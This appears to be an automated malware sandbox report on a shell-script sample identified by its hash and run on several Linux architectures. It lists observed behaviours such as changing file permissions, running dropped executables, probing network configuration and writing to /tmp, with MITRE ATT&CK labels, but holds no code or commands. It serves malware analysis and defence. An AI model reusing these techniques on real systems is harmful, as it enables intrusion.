Analysis
-
max time kernel
89s -
max time network
90s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
18/10/2024, 01:45
Static task
static1
Behavioral task
behavioral1
Sample
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
560efa949c2ce7044d49ee3d9ebff848ccb3033122d20bbcaa0b7399e9246636.sh
-
Size
10KB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads